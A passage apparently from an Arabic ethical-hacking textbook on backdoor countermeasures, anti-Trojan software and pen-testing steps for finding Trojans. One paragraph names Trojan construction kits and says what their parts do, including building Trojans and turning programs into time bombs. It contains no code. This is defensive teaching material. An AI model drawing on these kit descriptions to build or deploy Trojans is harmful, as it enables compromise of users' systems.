‫ﺗﺟﻧب ﻛﺗﺎﺑﺔ اﻷواﻣر ﺑﺷﻛل أﻋﻣﻰ وﺗﻧﻔﯾذ اﻟﺑراﻣﺞ أو اﻟﺑراﻣﺞ اﻟﻧﺻﯾﺔ اﻟﺟﺎھزة‪.‬‬ ‫‪-‬‬
‫إدارة ﺳﻼﻣﺔ ﻣﻠﻔﺎت ﻣﺣطﺔ اﻟﻌﻣل اﻟﻣﺣﻠﯾﺔ ﻣن ﺧﻼل ‪ ،auditing ،checksums‬وﻓﺣص اﻟﻣﻧﺎﻓذ‪.‬‬ ‫‪-‬‬
‫ﺗﺷﻐﯾل اﻹﺻدارات اﻟﻣﺣﻠﯾﺔ ﻣن اﻟﻔﯾروﺳﺎت‪ ،‬وﺟدار اﻟﺣﻣﺎﯾﺔ‪ ،‬وﺑراﻣﺞ ﻛﺷف اﻟﺗﺳﻠل ﻋﻠﻰ ﺳطﺢ اﻟﻣﻛﺗب‪.‬‬ ‫‪-‬‬
‫‪Backdoor Countermeasures‬‬
‫ﻟﻌل اﻟﻘول اﻟﻣﺄﺛور اﻟﻘدﯾم )اﻟوﻗﺎﯾﺔ ﺧﯾر ﻣن اﻟﻌﻼج( وﺛﯾﻖ اﻟﺻﻠﺔ ھﻧﺎ‪ .‬ﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض اﻟﺗداﺑﯾر اﻟﻣﺿﺎدة ﺿد ‪ backdoor‬وھﻲ ﻛﺎﻻﺗﻰ‪:‬‬
‫‪ -‬ﺧط اﻟدﻓﺎع اﻷول ھو ﺗﺛﻘﯾف اﻟﻣﺳﺗﺧدﻣﯾن ﺑﺷﺄن ﻣﺧﺎطر ﺗرﻛﯾب اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻲ ﺗم ﺗﻧزﯾﻠﮭﺎ ﻣن اﻹﻧﺗرﻧت‪ ،‬وﻋﻠﯾﮭم ﺗوﺧﻲ اﻟﺣذر إذا ﻛﺎن‬
‫ﻟدﯾﮭم إﻣﻛﺎﻧﯾﺔ ﻓﺗﺢ ﻣرﻓﻘﺎت اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪.‬‬
‫‪ -‬ﺧط اﻟدﻓﺎع اﻟﺛﺎﻧﻲ ﯾﻣﻛن أن ﯾﻛون ﻣﻧﺗﺟﺎت ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت اﻟﺗﻲ ھﻲ ﻗﺎدرة ﻋﻠﻰ اﻟﺗﻌرف ﻋﻠﻰ ﺗواﻗﯾﻊ طروادة‪ .‬ﯾﺟب أن ﯾﺗم ﺗطﺑﯾﻖ‬
‫اﻟﺗﺣدﯾﺛﺎت ﺑﺷﻛل ﻣﻧﺗظم ﻋﺑر اﻟﺷﺑﻛﺔ‪.‬‬
‫‪ -‬ﺧط اﻟدﻓﺎع اﻟﺛﺎﻟث ﯾﺄﺗﻲ ﻋن طرﯾﻖ اﻟﺣﻔﺎظ ﻋﻠﻰ ﺗﺣدﯾث إﺻدارات اﻟﺗطﺑﯾﻖ ﺑواﺳطﺔ ﺗﺗﺑﻊ ﺗﺻﺣﯾﺣﺎت اﻷﻣﺎن )‪(security patch‬‬
‫وﻣﻌرﻓﺔ ﻧﻘﺎط اﻟﺿﻌف‪.‬‬
‫اﺳﺗﺧدام أدوات ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت ﻣﺛل ﺑرﻧﺎﻣﺞ ‪ ،McAfee ،Windows Defender‬وﻧورﺗن ﻗﺎدر ﻋﻠﻰ ﻛﺷف وإزاﻟﺔ ‪.backdoor‬‬
‫‪Trojan horse Construction Kits‬‬
‫ھذه ‪ kits‬ﺗﺳﺎﻋد اﻟﻣﮭﺎﺟﻣﯾن ﻓﻲ ﺑﻧﺎء أﺣﺻﻧﺔ طروادة اﻟﺗﻲ ﯾﺧﺗﺎروﻧﮭﺎ‪ .‬اﻷدوات ﻓﻲ ھذه اﻟﻣﺟﻣوﻋﺎت ﯾﻣﻛن أن ﺗﻛون ﺧطﯾرة‪ ،‬وﯾﻣﻛن أن ﯾﺄﺗﻲ‬
‫ﺑﻧﺗﺎﺋﺞ ﻋﻛﺳﯾﺔ إذا ﻟم ﯾﻧﻔذ ﺑﺷﻛل ﺻﺣﯾﺢ‪ .‬ﺑﻌض ﻣﺟﻣوﻋﺎت طروادة اﻟﻣﺗﺎﺣﺔ ﻓﻲ اﻟﺑرﯾﺔ ھﻲ ﻛﻣﺎ ﯾﻠﻲ‪:‬‬
‫‪ Trojan Horse Construction Kit v2.0‬ﺗﺗﻛون ﻣن ﺛﻼﺛﺔ ﻣﻠﻔﺎت ﺗﻧﻔﯾذﯾﮫ )‪،Thck-fp.exe ،Thck-tc.exe :(exe file‬‬ ‫‪-‬‬
‫و‪ Thck.exe .Thck-tbc.exe‬ھو ﻣﻧﺷﺊ اﻟﺗروﺟﺎن اﻟﻔﻌﻠﻲ‪ .‬ﻣﻊ أداة ﺳطر اﻷواﻣر‪ ،‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺑﻧﺎء ﺣﺻﺎن طروادة ﻣن‬
‫اﺧﺗﯾﺎره‪ Thck-fp.exe .‬ھو ﻣﻧﺎور ﺣﺟم اﻟﻣﻠف‪ .‬ﻣﻊ ھذا‪ ،‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم إﻧﺷﺎء اﻟﻣﻠﻔﺎت ﻣن أي طول‪ ،‬وﺟﻌل أي ﻣن اﻟﻣﻠﻔﺎت ذات‬
‫طول ﻣﺣددة‪ ،‬أو ﺣﺗﻰ إﻟﺣﺎق ﻋدد ﻣﻌﯾن ﻣن وﺣدات اﻟﺑﺎﯾت إﻟﻰ ﻣﻠف‪ Thck-tbc.exe .‬ﺳوف ﯾﻘوم ﺑﺗﺣوﯾل أي ﺑرﻧﺎﻣﺞ ‪ COM‬إﻟﻰ‬
‫‪) Time Bomb‬ﻗﻧﺑﻠﺔ ﻣوﻗﺗﮫ(‪.‬‬
‫)‪ Progenic Mail Trojan Construction Kit (PMT‬ھو أداة ﺳطر أواﻣر واﻟﺗﻲ ﺗﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻹﻧﺷﺎء ‪EXE‬‬ ‫‪-‬‬
‫)‪ (PM.exe‬ﻹرﺳﺎﻟﮭﺎ إﻟﻰ ﺿﺣﯾﺔ‪.‬‬
‫‪ Pandora's Box‬ھو ﺑرﻧﺎﻣﺞ ﻣﺻﻣم ﻹﻧﺷﺎء أﺣﺻﻧﺔ طروادة‪/‬ﻗﻧﺎﺑل ﻣوﻗوﺗﺔ‪.‬‬ ‫‪-‬‬
‫)‪ (6.8‬اﻟﺘﻄﺒﯿﻘﺎت اﻟﻤﻀﺎدة ﺿﺪ اﻟﺘﺮوﺟﺎن )‪(Anti-Trojan Software‬‬
‫ﻗﺑل ھذا‪ ،‬ﻗد ﻧﺎﻗﺷﻧﺎ اﻟﻣﺿﺎدات اﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﺗوﻓر اﻟﺣﻣﺎﯾﺔ ﻟﻧظﺎم اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك واﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧزﻧﺔ ﻋﻠﯾﮫ ﺿد ﻣﺧﺗﻠف اﻟﺑرﻣﺟﯾﺎت‬
‫اﻟﺧﺑﯾﺛﺔ ﻣﺛل أﺣﺻﻧﺔ طروادة و‪ .backdoor‬ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪ ،‬ھﻧﺎك ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ طروادة اﻟﺗﻲ ﯾﻣﻛن أن ﺗﺣﻣﻲ أﻧظﻣﺔ اﻟﻛﻣﺑﯾوﺗر وأﺻول‬
‫اﻟﻣﻌﻠوﻣﺎت اﻷﺧرى ﺿد أﺣﺻﻧﺔ طروادة و‪ .backdoor‬اﻟﺑراﻣﺞ اﻟﻣﻛﺎﻓﺣﺔ ﺿد اﻟﺗروﺟﺎن ﺗﺗﻌﺎﻣل ﻣﻊ إزاﻟﺔ أو ﺗﻌطﯾل اﻟﺑراﻣﺞ اﻟﺧﺑﯾﺛﺔ‪.‬‬
‫ھذا اﻟﻘﺳم ﯾﺻف اﻟﻌدﯾد ﻣن اﻟﺑراﻣﺞ ﻟﻠﻣﻛﺎﻓﺣﺔ ﺿد طروادة‪.‬‬
‫‪Anti-Trojan Software: TrojanHunter‬‬

‫اﻟﻣﺻدر‪http://www.trojanhunter.com :‬‬
‫‪ TrojanHunter‬ھو ﻓﺎﺣص اﻟﺗطﺑﯾﻘﺎت اﻟﺧﺑﯾﺛﺔ اﻟذى ﯾﻛﺗﺷف وﯾزﯾل ﺟﻣﯾﻊ أﻧواع اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻣﺛل أﺣﺻﻧﺔ طروادة وﺑراﻣﺞ اﻟﺗﺟﺳس‪،‬‬
‫‪ ،adware‬و‪ ، dialers‬ﻣن ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك‪.‬‬

‫‪558‬‬
‫ﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن ﻣﻣﯾزات ‪ TrojanHunter‬ﻛﻣﺎ ﯾﻠﻲ‪:‬‬

‫‪ -‬اﻟﺳرﻋﺔ اﻟﻌﺎﻟﯾﺔ ﻓﻲ ﻓﺣص اﻟﻣﻠﻔﺎت ﯾﻌطﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﻛﺗﺷﺎف أﺣﺻﻧﺔ طروادة‪.‬‬
‫‪ -‬ﻓﺣص اﻟذاﻛرة ﻟﻠﻛﺷف ﻋن أي ﻣﺗﻐﯾر ﻣﻌدل ﻣن ﺑﻧﯾﺔ ﻣﻌﯾﻧﺔ ﻣن ﺣﺻﺎن طروادة‪.‬‬
‫‪ -‬ﻓﺣص ﻣﻠف اﻟﺳﺟل ﻟﻠﻛﺷف ﻋن آﺛﺎر أﺣﺻﻧﺔ طروادة ﻓﻲ ﻣﻠف اﻟﺳﺟل‪.‬‬
‫‪ -‬ﻓﺣص اﻟﻣﻠﻔﺎت ﺑﻌﻣﻖ ﻟﻠﻛﺷف ﻋن آﺛﺎر ﺣﺻﺎن طروادة ﻓﻲ ﻣﻠﻔﺎت اﻟﺗﻛوﯾن‪.‬‬
‫‪ -‬ﻓﺣص اﻟﻣﻧﺎﻓذ ﻟﻠﻛﺷف ﻋن ﻣﻧﺎﻓذ ﺗروﺟﺎن اﻟﻣﻔﺗوﺣﺔ‪.‬‬
‫‪ -‬اﻟﺗﺣﻠﯾل اﻟﻣﺗﻘدم ﻟﻠﺗروﺟﺎن‪ ،‬ھﻲ ﻣﯾزة ﺣﺻرﯾﺔ ﻣن ‪ ،TrojanHunter‬وھﻲ ﻗﺎدرة ﻋﻠﻰ اﻟﻌﺛور ﻋﻠﻰ ﻓﺋﺎت ﻛﺎﻣﻠﺔ ﻣن أﺣﺻﻧﺔ طروادة‬
‫ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺎت اﻟﻔﺣص اﻟﻣﺗطورة‪.‬‬
‫‪ TrojanHunter -‬اﻟﺣﺎرس ﯾﻘوم ﺑﻔﺣص اﻟذاﻛرة ‪ -‬ﻟﻛﺷف أي ﺣﺻﺎن طروادة إذا ﺗﻣﻛﻧﺎ ﻣن اﻟﺑدء‪.‬‬
‫‪ -‬ﻗﺎﺋﻣﺔ اﻟﻌﻣﻠﯾﺎت ﯾﻌطﻰ ﺗﻔﺎﺻﯾل ﺣول ﻛل ﻋﻣﻠﯾﺔ ﻗﯾد اﻟﺗﺷﻐﯾل ﻋﻠﻰ اﻟﻧظﺎم‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك اﻟﻣﺳﺎر إﻟﻰ اﻟﻣﻠف اﻟﻘﺎﺑل ﻟﻠﺗﻧﻔﯾذ اﻟﻔﻌﻠﻲ‪.‬‬
‫‪ -‬إزاﻟﺔ دﻗﯾﻘﺔ ﻟﺟﻣﯾﻊ أﺣﺻﻧﺔ طروادة اﻟﻣﻛﺗﺷﻔﺔ‪-‬ﺣﺗﻰ ﻟو ﻛﺎﻧت ﻗﯾد ﺑﺗﺷﻐﯾل أو ﻛﺎن ﺗم ﺣﻘن طروادة ﻧﻔﺳﮭﺎ ﻓﻲ ﻋﻣﻠﯾﺔ أﺧرى‪.‬‬
‫‪Anti-Trojan Software: Emsisoft Anti-Malware‬‬

‫اﻟﻣﺻدر‪http://www.emsisoft.com/en :‬‬
‫‪ Emsisoft Anti-Malware‬ﯾوﻓر ﺣﻣﺎﯾﺔ ﻣوﺛوﻗﺔ ﻟﻠﻧظﺎم اﻟﺧﺎص ﺑك ﺿد اﻟﺗﮭدﯾدات اﻟﻣﺧﺗﻠﻔﺔ ﻣﺛل اﻟﻔﯾروﺳﺎت وأﺣﺻﻧﺔ طروادة وﺑراﻣﺞ‬
‫اﻟﺗﺟﺳس‪ ،bots ،worms ،adware ،‬ﻛﯾﻠوﺟرز‪ ،‬و‪ .rootkits‬ﯾﺣﺗوي ﻋﻠﻰ اﺛﻧﯾن ﻣن اﻟﻔﺎﺣﺻﺎت اﻟﻣﺟﺗﻣﻌﺔ ﻣﻊ ﺑﻌض )ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت‬
‫وﻣﻛﺎﻓﺣﺔ اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ( ﻟﺗﻧظﯾف اﻟﻌدوى وﺛﻼﺛﺔ ﺣراس ﺿد اﻹﺻﺎﺑﺎت اﻟﺟدﯾدة‪ :‬ﺣﺎرس اﻟﻣﻠف‪ ،‬ﻏﺎﻟﻖ اﻟﺳﻠوك وﺣﻣﺎﯾﺔ اﻟﺗﺻﻔﺢ‪.‬‬

‫‪559‬‬
‫‪Anti-Trojan Software‬‬
‫ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﺗروﺟﺎن ﺗوﻓر اﻟﺣﻣﺎﯾﺔ ﻟﻧظﺎم اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك واﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧزﻧﺔ ﻋﻠﯾﮫ ﻣن ﺧﻼل ﻣﻧﻊ اﻟﻌدﯾد ﻣن اﻟﺗﮭدﯾدات اﻟﺧﺑﯾﺛﺔ ﻣﺛل‬
‫أﺣﺻﻧﺔ طروادة‪ ،worms ،‬واﻟﻔﯾروﺳﺎت‪ ،backdoor ،‬ﻋﻧﺎﺻر ﺗﺣﻛم ‪ ActiveX‬اﻟﺿﺎرة‪ ،‬وﺗطﺑﯾﻘﺎت ﺟﺎﻓﺎ ﻟدﺧول ﻧظﺎﻣك‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض‬
‫ﻣن ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﺗروﺟﺎن اﻟﺗﻲ ﺗﺳﺗﺧدم ﻟﻐرض ﻗﺗل اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪Anti-Trojan Shield (ATS) available at http://www.atshield.com‬‬
‫‪Spyware Doctor available at http://www.pctools.com‬‬
‫‪Anti-Malware BOClean available at http://www.comodo.com‬‬
‫‪Anti-Hacker available at http://www.hide-my-ip.com‬‬
‫‪XoftSpySE available at http://www.paretologic.com‬‬
‫‪SPYWAREfighter available at http://www.spamfighter.com‬‬
‫‪Anti-Trojan Elite available at http://www.remove-trojan.com‬‬
‫‪SUPERAntiSpyware available at http://www.superantispyware.com‬‬
‫‪Trojan Remover available at http://www.simplysup.com‬‬
‫‪Twister Antivirus available at http://www.filseclab.com‬‬
‫)‪ (6.9‬ﻣﺨﺘﺒﺮ اﻻﺧﺘﺮاق )‪(Penetration test‬‬
‫ﺑﻣﺛﺎﺑﺔ إﻧك ﻣﺧﺗﺑر اﺧﺗراق‪ ،‬ﻓﯾﺟب ﻋﻠﯾك اﺗﺑﺎع ﻧﻔس اﻻﺳﺗراﺗﯾﺟﯾﺎت ﻣﺛل اﻟﺗﻲ ﯾﺗﺑﻌﮭﺎ اﻟﻣﮭﺎﺟم ﻻﺧﺗﺑﺎر اﻟﺷﺑﻛﺔ أو اﻟﻧظﺎم ﺿد طروادة وھﺟﻣﺎت‬
‫‪ .backdoor‬ﯾﺟب ﺗﻧﻔﯾذ ﻛل ﻣﺎ ھو ﻣﺗﺎح ﻣن ﺗﻘﻧﯾﺎت اﻟﮭﺟوم ﺑﻣﺎ ﻓﻲ ذﻟك اﻟﺗﻘﻧﯾﺎت اﻟﮭﺟوم اﻟﺗﻲ ظﮭرت ﺣدﯾﺛﺎ‪ .‬ھذا ﯾﺳﻣﺢ ﻟك ﻟﻣﻌرﻓﺔ اﻟﺛﻐرات‬
‫أو ﻧﻘﺎط اﻟﺿﻌف ﻓﻲ أﻣن اﻟﻣﻧظﻣﺔ اﻟﮭدف‪ .‬إذا وﺟدت أي ﻧﻘﺎط ﺿﻌف أو ﺛﻐرات‪ ،‬ﯾﺟب أن ﺗﺷﯾر إﻟﻰ اﻟﺗداﺑﯾر اﻟﻣﺿﺎدة اﻟﺗﻲ ﯾﻣﻛن أن ﺗﺟﻌل أﻣن‬
‫اﻟﻣﻧظﻣﺔ ﺑﺷﻛل أﻓﺿل وأﻗوى‪.‬‬
‫‪Pen Testing For Trojans and Backdoors‬‬

‫اﻟﺨﻄﻮة ‪ :1‬ﺗﻔﺤﺺ اﻟﻤﻨﺎﻓﺬ اﻟﻤﻔﺘﻮﺣﺔ‬
‫اﻟﻣﻧﺎﻓذ اﻟﻣﻔﺗوﺣﺔ ھﻲ اﻟﻣﺻﺎدر اﻷوﻟﯾﺔ ﻟﺷن اﻟﮭﺟﻣﺎت‪ .‬ﻟذا‪ ،‬ﯾﺟب ان ﺗﺟد اﻟﻣﻧﺎﻓذ اﻟﻣﻔﺗوﺣﺔ ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﺟﻌل اﻟﺷﺑﻛﺔ آﻣﻧﺔ ﻋن طرﯾﻖ إﺟراء‬
‫اﺧﺗﺑﺎر اﻻﺧﺗراق وﺣﻣﺎﯾﺗﮭم‪ .‬ﯾﻣﻛﻧك اﻟﻌﺛور ﻋﻠﻰ اﻟﻣﻧﺎﻓذ اﻟﻣﻔﺗوﺣﺔ اﻟﺗﻲ ﻻ داﻋﻲ ﻟﮭﺎ ﻋن طرﯾﻖ ﻓﺣص اﻟﻣﻧﺎﻓذ اﻟﻣﻔﺗوﺣﺔ‪ .‬ﻟﮭذا اﻟﻐرض‪ ،‬ﯾﻣﻛﻧك‬
‫اﺳﺗﺧدام أدوات ﻣﺛل ‪ TCPView‬و‪.CurrPorts‬‬
‫اﻟﺨﻄﻮة ‪ :2‬ﺗﻔﺤﺺ اﻟﻌﻤﻠﯿﺎت اﻟﺠﺎرﯾﺔ‬
‫ﻣﻌظم أﺣﺻﻧﺔ طروادة ﻻ ﺗﺗطﻠب أذن ﻣن اﻟﻣﺳﺗﺧدم ﻟﺑدء ﻋﻣﻠﮫ‪ .‬ﻓﺈﻧﮭﺎ ﺗﺑدأ ﺗﻠﻘﺎﺋﯾﺎ وﺣﺗﻰ ﻻ ﯾﺧطر ذﻟك اﻟﻣﺳﺗﺧدم‪ .‬ھذا اﻟﻧوع ﻣن طروادة ﯾﻣﻛن‬
‫اﻟﻛﺷف ﻋﻧﮭﺎ ﻋن طرﯾﻖ ﻓﺣص اﻟﻌﻣﻠﯾﺎت ﻗﯾد اﻟﺗﺷﻐﯾل‪ .‬ﻣن أﺟل ﻓﺣص ﻋﻣﻠﯾﺎت ﻗﯾد اﻟﺗﺷﻐﯾل‪ ،‬ﯾﻣﻛﻧك اﺳﺗﺧدام أدوات ﻣﺛل ‪،What's Running‬‬
‫اﻟذي ﯾﻔﺣص ﻧظﺎﻣك وﯾﺳرد ﻛﺎﻓﺔ اﻟﺑراﻣﺞ اﻟﻧﺷطﺔ ﺣﺎﻟﯾﺎ‪ ،‬واﻟﻌﻣﻠﯾﺎت‪ ،‬واﻟﺧدﻣﺎت‪ ،‬وﺣدات‪ ،‬وﺷﺑﻛﺔ اﺗﺻﺎﻻت‪ .‬ﻓﺈﻧﮫ ﯾﺷﻣل أﯾﺿﺎ ﻣﻧﺎطﻖ ﺧﺎﺻﺔ‬
‫ﻟﻌرض ﺑراﻣﺞ ﺑدء اﻟﺗﺷﻐﯾل‪.‬‬
‫اﻟﺨﻄﻮة ‪ :3‬ﺗﻔﺤﺺ إدﺧﺎﻻت ‪registry‬‬
‫ھﻧﺎك ﻋدد ﻗﻠﯾل ﻣن ﺣﺻﺎن طروادة ﺗﻌﻣل ﻓﻲ اﻟﺧﻠﻔﯾﺔ دون أي إﺧطﺎر ﻟﻣﺳﺗﺧدم اﻟﻧظﺎم‪ .‬إذا ﻛﻧت ﺗرﻏب ﻓﻲ اﺧﺗﺑﺎر ﻣﺛل ﺣﺻﺎن طروادة‪ ،‬ﻓﻌﻠﯾك‬
‫أن ﺗﻔﺣص إدﺧﺎﻻت ‪ .registry‬وﯾﻣﻛن أن ﯾﺗم ذﻟك ﻣﻊ ﻣﺳﺎﻋدة ﻣن اﻷدوات ﻣﺛل ‪ JV Power Tools‬و‪.PC Tools Registry Mechanic‬‬
‫اﻟﺨﻄﻮة ‪ :4‬ﻓﺤﺺ ﺑﺮاﻣﺞ ﺗﺸﻐﯿﻞ اﻷﺟﮭﺰة اﻟﻤﺜﺒﺘﺔ ﻋﻠﻰ اﻟﻜﻤﺒﯿﻮﺗﺮ‬
‫ﻣن أﺟل اﻟﺳﯾطرة ﻋﻠﻰ اﻷﺟﮭزة‪ ،‬ﻓﺈن ﻣﻌظم أﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻟﺣدﯾﺛﺔ ﺗﺳﺗﺧدم ﺑراﻣﺞ ﺗﺷﻐﯾل اﻷﺟﮭزة اﻟﺧﺎﺻﺔ ﺑﮭم‪ .‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن اﻻﺳﺗﻔﺎدة ﻣن‬
‫ھذا اﻟوﺿﻊ ﻟﻧﺷر أﺣﺻﻧﺔ طروادة و‪ backdoor‬ﻣن ﺧﻼل ﻣﻠﻔﺎت ﺑرﻧﺎﻣﺞ ﺗﺷﻐﯾل اﻟﺟﮭﺎز‪ .‬ﺗﻧﺗﺷر أﺣﺻﻧﺔ طروادة ﻣن ﺧﻼل ﺑراﻣﺞ ﺗﺷﻐﯾل‬
‫اﻷﺟﮭزة ﺣﯾث ﺗﺻﯾب ﻣﻠﻔﺎت ﺑرﻧﺎﻣﺞ ﺗﺷﻐﯾل اﻟﺟﮭﺎز وﻏﯾرھﺎ ﻣن اﻟﻌﻣﻠﯾﺎت‪.‬‬
‫اﻟﺨﻄﻮة ‪ :5‬ﻓﺤﺺ ﺧﺪﻣﺎت اﻟﻮﯾﻨﺪوز‬
‫إذا وﺟدت أي ﻣن ﺧدﻣﺎت ‪ Windows‬اﻟﻣﺷﺑوھﺔ‪ ،‬ﻓﺗﺣﻘﻖ ﻣن اﻟﻣﻠﻔﺎت اﻟﻘﺎﺑﻠﺔ ﻟﻠﺗﻧﻔﯾذ اﻟﻣرﺗﺑطﺔ ﺑﮭﺎ‪ .‬ﻟﻔﺣص ﺧدﻣﺎت وﯾﻧدوز‪ ،‬ﯾﻣﻛﻧك اﺳﺗﺧدام‬
‫أدوات ﻣﺛل ‪ SrvMan‬و‪.ServiWin‬‬

‫‪560‬‬
‫اﻟﺨﻄﻮة ‪ :6‬ﻓﺤﺺ ﺑﺮاﻣﺞ ﺑﺪء اﻟﺘﺸﻐﯿﻞ‬

‫ﺑﻌض أﺣﺻﻧﺔ طروادة ﺗﺷﻐل ﺗﻠﻘﺎﺋﯾﺎ ﻋﻧد ﺑدء ﺗﺷﻐﯾل‪ . Windows‬ﻟذﻟك‪ ،‬ﻓﺣص ﺑراﻣﺞ ﺑدء اﻟﺗﺷﻐﯾل ﺑﺎﺳﺗﺧدام أدوات ﻣﺛل ‪،Starter‬‬
‫‪ ،Security AutoRun‬و ‪Autoruns‬واﻟﺗﺣﻘﻖ ﻣن ﺑراﻣﺞ ﺑدء اﻟﺗﺷﻐﯾل اﻟﻣدرﺟﺔ وﺗﺣدﯾد ﻣﺎ إذا ﻛﺎن ﯾﻣﻛن اﻟﺗﻌرف ﻋﻠﻰ ﺟﻣﯾﻊ اﻟﺑراﻣﺞ ﻓﻲ‬
‫اﻟﻘﺎﺋﻣﺔ ﻣﻊ اﻟوظﺎﺋف اﻟﻣﻌروﻓﺔ‪.‬‬
‫ﺧﻄﻮة ‪ :7‬ﻓﺤﺺ اﻟﻤﻠﻔﺎت واﻟﻤﺠﻠﺪات‬
‫ﻣن أﺳﮭل اﻟطرق ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻻﺧﺗراق اﻟﻧظﺎم ﻣﻊ اﺳﺗﺧدام اﻟﻣﻠﻔﺎت اﻟﻣﺿﻣﻧﺔ ﻣﻊ ﺣزم طروادة‪ .‬اﻟﺟدران اﻟﻧﺎرﯾﺔ‪ ،‬و‪ ،IDSes‬وآﻟﯾﺎت‬
‫أﻣﻧﯾﺔ أﺧرى ﻗد ﺗﻔﺷل ﻓﻲ ﻣﻧﻊ ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﺗﺣﺗﺎج إﻟﻰ ﻓﺣص ﺟﻣﯾﻊ اﻟﻣﻠﻔﺎت واﻟﻣﺟﻠدات ﻷﺣﺻﻧﺔ طروادة و‪.Backdoor‬‬
‫ﯾﻣﻛﻧك ﻓﺣص اﻟﻣﻠﻔﺎت واﻟﻣﺟﻠدات ﺑﺎﺳﺗﺧدام أدوات ﻣﺛل‪ ،FastSum ،SIGVERIF ،TRIPWIRE ، FCIV‬و‪.WinMD5‬‬
‫ﺧﻄﻮة ‪ :8‬ﻓﺤﺺ ﻷﻧﺸﻄﺔ اﻟﺸﺒﻜﺔ‬
‫أﻧﺷطﺔ اﻟﺷﺑﻛﺔ ﻣﺛل ﺗﺣﻣﯾل اﻟﻣﻠﻔﺎت أو اﻻﺳﺗﺧدام اﻟﻛﺑﯾر ﻟﺣرﻛﺔ اﻟﻣرور ﻋﻠﻰ ﻧﺣو ﻏﯾر ﻋﺎدي ﻓﻲ اﻟذھﺎب اﻟﻰ ﻋﻧوان وﯾب ﻣﻌﯾن ﻗد ﯾﻣﺛل ﻓﻲ‬
‫ﺑﻌض اﻷﺣﯾﺎن ﻋﻼﻣﺔ ﻋﻠﻰ وﺟود طروادة‪ .‬ﯾﺟب أن ﺗﻔﺣص ﻣﺛل ھذه اﻷﻧﺷطﺔ اﻟﺷﺑﻛﺔ‪ .‬أدوات ﻣﺛل ‪ Capsa Network Analyzer‬واﻟﺗﻲ‬
‫ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﮭذا اﻟﻐرض‪.‬‬
‫ﺧﻄﻮة ‪ :9‬ﻓﺤﺺ اﻟﺘﻌﺪﯾﻼت ﻋﻠﻰ ﻣﻠﻔﺎت ﻧﻈﺎم اﻟﺘﺸﻐﯿﻞ‬
‫ﯾﺟب ﻓﺣص وﺟود أي ﻣن اﻟﺗﻌدﯾﻼت او اﻟﺗﻼﻋب ﻓﻲ ﻣﻠﻔﺎت ﻧظﺎم اﻟﺗﺷﻐﯾل ﺑﺎﺳﺗﺧدام أدوات ﻣﺛل ‪ TRIPWIRE‬أو ﯾدوﯾﺎ ﺑﻣﻘﺎرﻧﺔ ﻗﯾم اﻟﮭﺎش‬
‫إذا ﻛﺎن ﻟدﯾك ﻧﺳﺧﺔ اﺣﺗﯾﺎطﯾﺔ‪.‬‬
‫اﻟﺨﻄﻮة ‪ :10‬ﺗﺸﻐﯿﻞ ﻓﺎﺣﺺ ﺗﺮوﺟﺎن ﻟﻠﻜﺸﻒ ﻋﻦ أي ﺗﺮوﺟﺎن‬
‫ﻓﺎﺣص ﺗروﺟﺎن ﻣﺛل ‪ TrojanHunter‬و‪ Emsisoft Anti-Malware‬ﻣﺗوﻓرة ﻓﻲ اﻟﺳوق‪ .‬ﯾﻣﻛﻧك ﺗﺛﺑﯾت وﺗﺷﻐﯾل ھذه اﻟﻔﺎﺣﺻﺎت ﻟﻠﻛﺷف‬
‫ﻋن ﺣﺻﺎن طروادة ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪.‬‬
‫ﺧﻄﻮة ‪ :11‬ﺗﻮﺛﯿﻖ ﺟﻤﯿﻊ اﻟﻨﺘﺎﺋﺞ‬
‫ﺑﻣﺟرد إﺟراء ﺟﻣﯾﻊ اﻻﺧﺗﺑﺎرات واﻟﺗﻲ ﻣن اﻟﻣﻣﻛن اﻟﻌﺛور ﻋﻠﻰ أﺣﺻﻧﺔ طروادة‪ ،‬وﺗوﺛﯾﻖ ﺟﻣﯾﻊ اﻟﻧﺗﺎﺋﺞ اﻟﺗﻲ ﺗﺣﺻل ﻋﻠﯾﮭﺎ ﻓﻲ ﻛل اﺧﺗﺑﺎر‬
‫ﻟﻠﺗﺣﻠﯾل واﻟﺗﺣﻘﻖ ﻣن وﺟود أي ﻋﻼﻣﺔ ﻋﻠﻰ وﺟود ﺣﺻﺎن طروادة‪.‬‬
‫ﺧﻄﻮة ‪ :12‬ﻋﺰل اﻟﺠﮭﺎز ﻣﻦ اﻟﺸﺒﻜﺔ‬
